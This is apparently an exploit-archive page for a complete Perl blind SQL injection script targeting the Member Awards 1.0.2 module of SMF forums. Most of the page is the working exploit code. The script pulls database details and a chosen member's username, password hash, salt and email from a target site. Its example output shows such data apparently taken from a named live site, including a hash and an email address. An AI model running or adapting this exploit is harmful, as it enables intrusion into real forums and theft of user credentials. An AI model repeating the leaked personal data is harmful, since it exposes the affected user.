exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SMF Member Awards 1.0.2 SQL Injection

SMF Member Awards 1.0.2 SQL Injection
Posted Jun 30, 2009
Authored by eLwaux

Member Awards SMF module version 1.0.2 blind SQL injection exploit.

tags | exploit, sql injection
SHA-256 | 5f91bb63b6784de02423e031098e5ed06fbd14080321f0d136c3aea71bdcb604

SMF Member Awards 1.0.2 SQL Injection

Change Mirror Download
-------------------------------------------------------------------------
SMF Component Member Awards Blind SQL-injection Vulnerability
-------------------------------------------------------------------------
author: eLwaux
thanks: mailbrush, antichat.ru, uasc.org.ua
-------------------------------------------------------------------------
usage:
expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}
params:
-v = get version()
-u = get user()
-d = get database()
-an = get User Name (логин)
-ap = get User Password (sha1 хеш)
-as = get User Salt (сальт)
-am = get User Mail (емейл)
-------------------------------------------------------------------------
(
also you can modif script source:
$SHOW_ALL = 1; == show brute-step result
$SHOW_COUNT_REQ = 1 == show req's count
$OPTIMAL = 1 == optimal brute
)
-------------------------------------------------------------------------
example:
http://scrubs.net.ru/cms/forum/index.php

] Host: scrubs.net.ru
BAD answer = 'Ошибка'
] version() = 5
] user() = us5729a@localhost
] database() = db
] id=1 NAME = zhbanito
] id=1 PASS = 4edd40635ac6fd263084d5ccc6fdc624fef3c932
] id=1 SALT = fe81
] id=1 MAIL = shpioner@mail.ru
-------------------------------------------------------------------------
exploit (perl):

#! /usr/bin/perl -w

use IO::Socket;
use warnings;
#use threads;
#use threads::shared;

$SHOW_ALL = 1;
$SHOW_COUNT_REQ = 1;
$OPTIMAL = 1;

print " SMF ] MemberAwards 1.0.2 exploit\n";
print " eLwaux(c)antichat 2009\n\n";

if (!$ARGV[0]) {
print " usage:\n".
" expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params}\n".
" params:\n".
" -v = get version()\n".
" -u = get user()\n".
" -d = get database()\n".
" -an = get User Name\n".
" -ap = get User Password\n".
" -as = get User Salt\n".
" -am = get User Mail\n";
exit(0);
}

my $Uid = (!$ARGV[1])?'1':$ARGV[1];
my $pref = (!$ARGV[2])?'smf_':$ARGV[2];
$link .= $ARGV[0].'?action=profile;sa=awardsMembers;u='.$Uid.';id={SQL}';

$getV = $getU = $getD = $getAN = $getAP = $getAS = $getAM = 0;
for (my $i=0;$i<$#ARGV+1;$i++) {
my $q = $ARGV[$i];
$getV = 1 if ($q eq '-v');
$getU = 1 if ($q eq '-u');
$getD = 1 if ($q eq '-d');
$getAN = 1 if ($q eq '-an');
$getAP = 1 if ($q eq '-ap');
$getAS = 1 if ($q eq '-as');
$getAM = 1 if ($q eq '-am');
}

if ($link =~ /[http:\/\/]{0,}(.+?)\/.+?{SQL}/) {
$host = $1;
}

print ' ] Host: '.$host."\n";
$BAD = &getBadAnswer();

my $SFrom = 0;
$SFrom = 41 if ($OPTIMAL == 1);
my $SEnd = 0;
$SEnd = 122 if ($OPTIMAL == 1);

print " BAD answer = '$BAD'\n\n";
print ' ] version() = '.&getVersion(3,5)."\n" if ($getV==1);
print ' ] user() = '.&getUser1($SFrom,$SEnd)."\n" if ($getU==1); # a..z
print ' ] database() = '.&getDatabase($SFrom,$SEnd)."\n" if ($getD==1); # a..z
print "\n";

print ' ] id='.$Uid.' NAME = '.&getAdminName($SFrom,$SEnd)."\n" if ($getAN==1); # 0..9,a..z
print ' ] id='.$Uid.' PASS = '.&getAdminPass($SFrom,$SEnd)."\n" if ($getAP==1); # 0..9,a..z
print ' ] id='.$Uid.' SALT = '.&getAdminSalt($SFrom,$SEnd)."\n" if ($getAS==1); # a..z
print ' ] id='.$Uid.' MAIL = '.&getAdminMail($SFrom,$SEnd)."\n" if ($getAM==1); # a..z

#print "\n";
print ' ] requests() = '.$SHOW_COUNT_REQ."\n"; # a..z

exit(0);



# get BAD answer
sub getBadAnswer() {
$BAD = "An Error Has Occurred!";
if (&req('1+and+substring(version(),1,1)=-1##+',1000) =~ /<meta name="description" content="(.+?)" .>/) {
$BAD = $1;
}
return $BAD;
}

# GET VERSION() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--=
# ascii(lower(substring(version(),x,1) WHERE IN (1,...,Y)
sub getVersion($$) {
for($i=$_[0]; $i<=$_[1]; $i++) {
$r = &req('1+and+substring(version(),1,1)='.$i.'##+',1000);
if ($r =~ /<meta name="description" content="(.+?)" .>/) {
if (index($1,$BAD)==-1) {
$SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0);
return $i;
}
}
}
return '<'.$_[0].' and >'.$_[1];
}

# GET USER() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--=
# ascii(lower(substring(user(),x,1) WHERE IN (1,...,Y)
sub getUser1($$) {
return &wherein($_[0],$_[1],'user()',0);
}

# GET DATABASE -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--=
# ascii(lower(substring(database(),x,1) WHERE IN (1,...,Y)
sub getDatabase($$) {
return &wherein($_[0],$_[1],'database()',0);
}

# GET USER METHOD 2 -==--=--=-=-=-=-=-=
# ascii(lower(substring(user(),1,1)))=Y
sub getUser2($$) {
$finish = 0; $s = 1;
$user = '';
while ($finish!=1) {
$gs = 0;
print " user($s): \n" if ($SHOW_ALL==1);
for($i=$_[0]; $i<=$_[1]; $i++) {
if (&req('1+and+ascii(lower(substring(user(),'.$s.',1)))='.$i.'##+',1000) =~ /<meta name="description" content="(.+?)" .>/) {
print " (".chr($i).") $i,\n" if ($SHOW_ALL==1);
if (index($1,$BAD)==-1) {
$user .= chr($i);
print " found $s chars: $i = ".chr($i)." ($user)\n" if ($SHOW_ALL==1);
$s++; $gs = 1;
last;
}
}
}
print "\n" if ($SHOW_ALL==1);
if ($gs == 0) {
if ($user eq '') {return '<'.$_[0].' and >'.$_[1];}
else {return $user;}
}
}

}

# GET ADMIN PASS_HASH -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--=
#smf_members (ID_MEMBER,memberName,passwd,emailAddress,passwordSalt)
# passwd = sha1(strtolower(username.password)
# salt = substr(md5(mt_rand()), 0, 4)

sub getAdminName($$) {
return &wherein($_[0],$_[1],'memberName',1);
}
sub getAdminPass($$) {
return &wherein($_[0],$_[1],'passwd',1);
}
sub getAdminSalt($$) {
return &wherein($_[0],$_[1],'passwordSalt',1);
}
sub getAdminMail($$) {
return &wherein($_[0],$_[1],'emailAddress',1);
}


# NEED FUNCTIONS -==--=--=-=-=-=-=-=-=-=-=-==-=--=

sub req($$) {
$SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0);
$l = $link;
$l =~ s/{SQL}/$_[0]/;
$r = "GET $l HTTP/1.1\r\nHost: $host\r\n\r\n";
my $sock = sock();
print $sock $r;
read($sock,my $a,$_[1]);
return $a;
}

sub mlist($$) {
$s = '';
for(my $i=$_[0];$i<=$_[1];$i++) {$s.=$i.',';}
return substr($s,0,length($s)-1);
}


sub wherein($$$$) { # ,,,, (1=user,2=else)
print " ] $_[2]\n" if ($SHOW_ALL==1);
my $WHEREIN = 10; # WHERE IN (1,2,3,4,5,6,7,8,9,10)
my $res = ''; my $c = 1;
my $fmin = $_[0];
my $fmax = $_[1];
while ($c>=1) {
my $gs = 0;
for (my $i=0;$i<=int(($fmax-$fmin)/$WHEREIN);$i++){
my $s1 = int($fmin+$i*$WHEREIN);
my $s2 = int(($s1+$WHEREIN)>$fmax)?$fmax:($s1+$WHEREIN);
my $ch = ($_[3]==1)?&getUBRUTE($s1,$s2,$c,$_[2]):&getBRUTE($s1,$s2,$c,$_[2]);
if ($ch ne '?') {
$res.=$ch; print " $_[2]($c) = $ch [$res]\n" if ($SHOW_ALL==1);
$c++; $gs = 1; last;
}
}
if ($gs == 0) { $c=-1; return $res; last; }
}
}

sub getBRUTE($$$$) { #start,end,pos,text
print ' '.$_[0].'...'.$_[1].' ['.$_[2]."]\n" if ($SHOW_ALL==1);
if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) {
if (index($1,$BAD)==-1) {
for(my $i=$_[0]; $i<=$_[1]; $i++) {
if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))='.$i.'%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) {
if (index($1,$BAD)==-1) {
return chr($i); last;
}
}
}
}
}
return '?';
}

sub getUBRUTE($$$$) { #start,end,pos,text
print ' ['.$_[2].'] '.$_[0].'...'.$_[1]."\n" if ($SHOW_ALL==1);
if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) {
if (index($1,$BAD)==-1) {
for(my $i=$_[0]; $i<=$_[1]; $i++) {
if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')='.$i.'%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) {
if (index($1,$BAD)==-1) {
return chr($i); last;
}
}
}
}
}
return '?';
}

sub sock {
my $sock;
do {
$sock = new IO::Socket::INET
(
PeerAddr => $host,
PeerPort => 80,
PeerProto => 'tcp',
TimeOut => 10
) or print " ] connection error!\n";
} while (!$sock);
return $sock;
}
-------------------------------------------------------------------------

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close